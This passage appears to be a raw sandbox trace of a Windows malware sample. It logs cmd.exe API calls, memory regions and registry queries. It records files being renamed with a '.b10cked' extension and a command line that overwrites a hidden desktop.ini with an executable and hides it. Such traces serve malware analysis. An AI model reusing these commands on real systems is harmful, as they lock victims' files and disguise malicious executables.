_String2="CHDIR") returned 10 [0205.458] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0205.458] _wcsicmp (_String1="move", _String2="REN") returned -5 [0205.458] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0205.458] _wcsicmp (_String1="move", _String2="SET") returned -6 [0205.458] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0205.458] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0205.458] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0205.458] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0205.458] _wcsicmp (_String1="move", _String2="MD") returned 11 [0205.458] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0205.458] _wcsicmp (_String1="move", _String2="RD") returned -5 [0205.458] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0205.458] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0205.458] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0205.458] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0205.458] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0205.458] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0205.459] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0205.459] _wcsicmp (_String1="move", _String2="VER") returned -9 [0205.459] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0205.459] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0205.459] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0205.459] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0205.459] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0205.459] _wcsicmp (_String1="move", _String2="START") returned -6 [0205.459] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0205.459] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0205.459] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0205.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.552] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f2cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f2c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f2c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0205.552] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0205.553] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0205.553] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0205.554] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0205.554] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0205.554] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm")) returned 0x20 [0205.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x401e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.554] SetErrorMode (uMode=0x0) returned 0x0 [0205.554] SetErrorMode (uMode=0x1) returned 0x0 [0205.554] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x24ec54, lpFilePart=0x24ec3c | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", lpFilePart=0x24ec3c*="state.rsm") returned 0x2d [0205.554] SetErrorMode (uMode=0x0) returned 0x1 [0205.554] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1")) returned 0x10 [0205.554] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0205.554] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0205.554] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm")) returned 0x20 [0205.554] SetErrorMode (uMode=0x0) returned 0x0 [0205.554] SetErrorMode (uMode=0x1) returned 0x0 [0205.555] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x24f0d0, lpFilePart=0x24ee68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", lpFilePart=0x24ee68*="state.rsm") returned 0x2d [0205.555] SetErrorMode (uMode=0x0) returned 0x1 [0205.555] SetErrorMode (uMode=0x0) returned 0x0 [0205.555] SetErrorMode (uMode=0x1) returned 0x0 [0205.555] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x24f2d8, lpFilePart=0x24ee68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked", lpFilePart=0x24ee68*="state.rsm.b10cked") returned 0x35 [0205.555] SetErrorMode (uMode=0x0) returned 0x1 [0205.555] SetLastError (dwErrCode=0x0) [0205.555] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm.b10cked")) returned 0xffffffff [0205.555] GetLastError () returned 0x2 [0205.555] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x24e7e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e7e4) returned 0x3f0e88 [0205.555] FindNextFileW (in: hFindFile=0x3f0e88, lpFindFileData=0x24e7e4 | out: lpFindFileData=0x24e7e4) returned 0 [0205.556] GetLastError () returned 0x12 [0205.556] FindClose (in: hFindFile=0x3f0e88 | out: hFindFile=0x3f0e88) returned 1 [0205.557] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x401bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x401bf0) returned 0x3f0e88 [0205.557] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x24ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked", lpFilePart=0x0) returned 0x35 [0205.557] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x24ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm", lpFilePart=0x0) returned 0x2d [0205.557] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm")) returned 0x20 [0205.557] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm"), lpNewFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\state.rsm.b10cked"), dwFlags=0x3) returned 1 [0205.557] FindClose (in: hFindFile=0x3f0e88 | out: hFindFile=0x3f0e88) returned 1 [0205.558] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ea30 | out: _Buffer=" 1") returned 9 [0205.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.558] GetFileType (hFile=0x7) returned 0x2 [0205.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e9bc | out: lpMode=0x24e9bc) returned 1 [0205.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24e9f0 | out: lpConsoleScreenBufferInfo=0x24e9f0) returned 1 [0205.558] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0205.559] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ea30 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0205.559] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ea14, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ea14*=0x1a) returned 1 [0205.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.559] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.559] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.559] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.559] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.559] SetConsoleInputExeNameW () returned 0x1 [0205.559] GetConsoleOutputCP () returned 0x1b5 [0205.559] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.559] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.560] exit (_Code=0) Process: id = "494" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x4d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30306 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30307 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 30308 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 30309 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30310 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30311 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30312 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30313 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30314 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 30315 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30389 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30390 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30391 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30392 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 30393 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 30394 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30395 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30396 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30397 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30398 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30399 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30400 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30401 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30402 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30403 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30404 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30405 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30406 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 30407 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 30408 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 30409 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 30410 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 30411 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 30412 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 30413 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 692 os_tid = 0xd68 [0205.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f9c4 | out: lpSystemTimeAsFileTime=0x12f9c4*(dwLowDateTime=0xaf510440, dwHighDateTime=0x1d440a9)) [0205.531] GetCurrentProcessId () returned 0x4d4 [0205.531] GetCurrentThreadId () returned 0xd68 [0205.531] GetTickCount () returned 0x39e31 [0205.531] QueryPerformanceCounter (in: lpPerformanceCount=0x12f9bc | out: lpPerformanceCount=0x12f9bc*=26231981833) returned 1 [0205.531] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0205.531] __set_app_type (_Type=0x1) [0205.531] __p__fmode () returned 0x76b331f4 [0205.531] __p__commode () returned 0x76b331fc [0205.531] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0205.532] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0205.532] GetCurrentThreadId () returned 0xd68 [0205.532] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd68) returned 0x38 [0205.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.532] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0205.532] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f954 | out: phkResult=0x12f954*=0x0) returned 0x2 [0205.532] VirtualQuery (in: lpAddress=0x12f98b, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.532] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0205.532] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0205.532] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.532] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f924, dwLength=0x1c | out: lpBuffer=0x12f924*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0205.532] GetConsoleOutputCP () returned 0x1b5 [0205.532] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.532] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0205.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0205.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.533] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.533] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0205.533] GetEnvironmentStringsW () returned 0x2c04b0* [0205.534] FreeEnvironmentStringsW (penv=0x2c04b0) returned 1 [0205.534] GetEnvironmentStringsW () returned 0x2c04b0* [0205.534] FreeEnvironmentStringsW (penv=0x2c04b0) returned 1 [0205.534] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e8c4 | out: phkResult=0x12e8c4*=0x40) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x60, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x1, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x1, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x0, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x40, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x40, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x40, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegCloseKey (hKey=0x40) returned 0x0 [0205.534] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e8c4 | out: phkResult=0x12e8c4*=0x40) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x40, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x1, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 